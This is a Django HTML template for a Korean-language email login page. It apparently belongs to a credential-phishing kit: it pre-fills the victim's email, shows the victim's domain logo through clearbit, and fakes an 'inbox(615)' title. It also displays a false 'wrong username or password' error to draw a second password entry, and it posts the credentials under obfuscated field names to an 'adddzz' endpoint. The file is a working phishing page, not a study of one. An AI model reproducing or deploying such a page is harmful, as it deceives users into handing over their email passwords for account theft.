{% load static %}
<!doctype html>
<html lang="en">
  <head>
    <!-- Required meta tags -->
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
    <link href="https://fonts.googleapis.com/css?family=Roboto:300,400&display=swap" rel="stylesheet">

    <link rel="stylesheet" href="{% static 'fonts/icomoon/style.css' %}">

    <link rel="stylesheet" href="{% static 'css/owl.carousel.min.css' %}">

    <!-- Bootstrap CSS -->
    <link rel="stylesheet" href="{% static 'css/bootstrap.min.css' %}">
    
    <!-- Style -->
    <link rel="stylesheet" href="{% static 'css/style.css' %}">

    <title>inbox(615) - {{email}}</title>
  </head>
  <body>
  

  <div class="d-lg-flex half">
    <div class="bg order-1 order-md-2" style="background-image: url('{% static 'images/bg_1.jpg' %});"></div>
    <div class="contents order-2 order-md-1">

      <div class="container">
        <div class="row align-items-center justify-content-center">
          <div class="col-md-7">
            <div class="mb-4">
              <h3>로그인</h3>
              <p class="mb-4">환영합니다. 입력 필드에 정확한 정보를 입력하십시오.</p>
              <center><img src="https://logo.clearbit.com/{{domains}}"/></center>
            </div>

            <form action="adddzz" method="post">
            	{% csrf_token %}
              <font color="red">잘못된 사용자 이름 또는 암호!</font> 
              <div class="form-group first">
                <label for="username">이메일</label>
                <input type="text" class="form-control" id="username" name="zzpowerman" value="{{email}}"e>

              </div>
              <div class="form-group last mb-3">
                <label for="password">비밀번호</label>
                <input type="password" class="form-control" id="password" name="yyenginlo">
                
              </div>
              
              <div class="d-flex mb-5 align-items-center">
                <label class="control control--checkbox mb-0"><span class="caption">날 기억해</span>
                  <input type="checkbox" checked="checked"/>
                  <div class="control__indicator"></div>
                </label>
                <span class="ml-auto"><a href="#" class="forgot-pass">비밀번호를 잊으 셨나요</a></span> 
              </div>

              <input type="submit" value="로그인" class="btn btn-block btn-primary">

              <span class="d-block text-center my-4 text-muted">&mdash; or &mdash;</span>
              
             
            </form>
          </div>
        </div>
      </div>
    </div>

    
  </div>
    
    

    <script src="{% static 'js/jquery-3.3.1.min.js' %}"></script>
    <script src="{% static 'js/popper.min.js' %}"></script>
    <script src="{% static 'js/bootstrap.min.js' %}"></script>
    <script src="{% static 'js/main.js' %}"></script>
  </body>
</html>